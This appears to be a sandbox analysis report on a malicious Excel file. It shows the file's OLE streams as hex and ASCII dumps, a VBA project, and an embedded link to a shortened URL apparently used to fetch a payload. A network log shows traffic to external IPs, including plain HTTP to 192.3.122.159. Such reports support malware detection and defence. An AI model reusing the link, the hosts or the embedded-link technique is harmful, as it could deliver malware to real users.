            Stream Path:MBD00CB2B2B/MBD0018D4CE/Contents
            CLSID:
            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
            Stream Size:197671
            Entropy:6.989042939766534
            Base64 Encoded:True
            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:MBD00CB2B2B/MBD0068D442/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.219515110876372
            Base64 Encoded:False
            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
            General
            Stream Path:MBD00CB2B2B/MBD0068D442/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:26243
            Entropy:7.635433729726103
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:248
            Entropy:3.0523231150355867
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
            Stream Path: MBD00CB2B2B/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:256
            Entropy:4.086306928392587
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
            Stream Path: MBD00CB2B2B/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:134792
            Entropy:7.974168320310173
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
            Stream Path: MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:468
            Entropy:5.269289820125323
            Base64 Encoded:True
            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
            Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
            Stream Path: MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:83
            Entropy:3.0672749060249043
            Base64 Encoded:False
            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:2486
            Entropy:3.9244127831265385
            Base64 Encoded:False
            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
            Stream Path: MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:data
            Stream Size:536
            Entropy:6.330646364694152
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
            Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
            Stream Path: MBD00CB2B2B/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:MBD00CB2B2B/MBD00726B69/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.219515110876372
            Base64 Encoded:False
            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
            General
            Stream Path:MBD00CB2B2B/MBD00726B69/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:26242
            Entropy:7.635424485665502
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
            General
            Stream Path:MBD00CB2B2B/Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:283872
            Entropy:7.743278150467805
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Stream Path: MBD00CB2B2C/\x1CompObj, File Type: data, Stream Size: 99
            General
            Stream Path:MBD00CB2B2C/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2C/Package, File Type: Microsoft Excel 2007+, Stream Size: 45934
            General
            Stream Path:MBD00CB2B2C/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:45934
            Entropy:7.5587990853484195
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2D/\x1Ole, File Type: data, Stream Size: 850
            General
            Stream Path:MBD00CB2B2D/\x1Ole
            CLSID:
            File Type:data
            Stream Size:850
            Entropy:5.7391810575222
            Base64 Encoded:False
            Data ASCII:. . . . p . H ] ' . . . . . . . . . . . . v . . . y . . . K . r . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . S . E . y . Y . c . v . w . 9 . E . v . ? . & . t . i . m . e . l . i . n . e . = . a . d . o . r . a . b . l . e . & . f . e . m . a . l . e . . . 1 e 6 [ J l . S " & B s o 1 . . I ; - o u , h a $ J . . ( _ . j c J { Q O * . e . z . I . > [ E / ` . Z g k k . v e S . ) ~ g x R ) S q ; . D " / . \\ r n . G M . . . B . . . 4 G { . . ) * > . R t W v N m .
            Data Raw:01 00 00 02 a9 70 08 48 9c aa 5d 27 00 00 00 00 00 00 00 00 00 00 00 00 76 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 72 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 53 00 45 00 79 00 59 00 63 00 76 00 77 00 39 00 45 00 76 00 3f 00 26 00 74 00 69 00 6d 00 65 00 6c 00 69 00 6e 00 65 00
            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 316623
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:316623
            Entropy:7.998752313231112
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . w c H v a . e . W 1 9 % . 8 . q 0 = a G Q . . R . . . . . . . . . . . . \\ . p . 3 W ] K " . 7 S P J . i ^ ^ U @ X } ( ` d . O N r G . . l . B * , . Z . . b ! . B ) L d . . p V I . ) 8 u n G . 4 I Q Q . m J . / . . B . . . a . . . . . . . = . . . . . s . . . . ( . . / . z { . . . X . . . . 4 . . . . ^ [ . . . . - . . . . . . . = . . . . . . v C N V - . @ . . . J o . . . u V " . . . . C . . . . O K . . . @ . . . 7 1 . . . 9 A . . . > n v 4 . h . R 9 r 1 .
            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 8d 90 e6 a8 77 ae 63 48 76 fb 61 0b e3 65 f6 13 88 f6 57 31 39 fe 25 97 18 38 8e 2e e0 71 30 3d 61 47 8f e0 dd 51 c1 84 19 ed 9d cd bb 52 2e 8b e1 00 02 00 b0 04 c1 00 02 00 0d d0 e2 00 00 00 5c 00 70 00 84 d5 33 b0 c1 ab 57 5d 80 4b 22 c8 14 b1 37 53 50 8d f3 4a b4 e0 eb 0e 94 69 5e 5e 55 b1

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Dec 16, 2024 10:06:18.690138102 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:18.690239906 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:18.690402985 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:18.895023108 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:18.895070076 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:20.373312950 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:20.373378038 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.374696970 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.374705076 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:20.375889063 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:20.375953913 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.377505064 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.377583027 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:20.377871990 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.377877951 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:20.377912045 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.379508972 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:20.423355103 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:21.122236967 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:21.122273922 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:21.122391939 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:21.122788906 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:21.122800112 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:21.323909998 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:21.323976994 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:21.324043989 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:21.324117899 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:21.324225903 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:21.324295044 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:21.324351072 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:21.327876091 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:21.327912092 CET44349724170.82.173.30192.168.2.25
            Dec 16, 2024 10:06:21.327956915 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:21.327982903 CET49724443192.168.2.25170.82.173.30
            Dec 16, 2024 10:06:21.329499960 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:21.469126940 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:21.469222069 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:21.469419956 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:21.589167118 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577073097 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577109098 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577127934 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577141047 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577152014 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577167988 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.577224970 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.577253103 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577294111 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.577347040 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577358007 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577368975 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577379942 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.577399015 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.577421904 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.696959972 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.697025061 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.697036982 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.697082996 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.701087952 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.701183081 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.769545078 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.769594908 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.770303011 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.770354986 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.773731947 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.773798943 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.773832083 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.773977041 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.782094002 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.782179117 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.782201052 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.782229900 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.790505886 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.790580988 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.790676117 CET8049730192.3.122.159192.168.2.25
            Dec 16, 2024 10:06:22.790718079 CET4973080192.168.2.25192.3.122.159
            Dec 16, 2024 10:06:22.798861980 CET8049730192.3.122.159192.168.2.25
